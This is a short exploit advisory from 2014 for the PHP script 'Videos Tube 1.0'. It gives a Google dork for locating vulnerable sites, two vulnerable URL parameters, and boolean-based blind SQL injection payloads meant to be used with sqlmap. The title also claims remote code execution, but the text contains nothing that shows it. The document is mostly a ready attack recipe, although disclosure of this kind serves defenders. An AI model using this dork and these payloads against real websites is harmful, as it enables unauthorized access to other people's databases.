# Exploit Title: Videos Tube SQL Injection and Remote Code Execution# Google Dork: inurl:"single.php?url=" video# Date: 05.05.2014# Exploit Author: Mustafa ALTINKAYNAK# Vendor Homepage: http://www.phpscriptlerim.com# Software Link: http://demo.phpscriptlerim.com/free/videostube/# Version: 1.0
Description (Açıklama)========================
Category, showing video on the page are two types of SQL injection. Boolean-based blind and AND / OR time-based blind. Incoming data can be filtered off light.
Vulnerability
========================1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMAP Tool)2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool)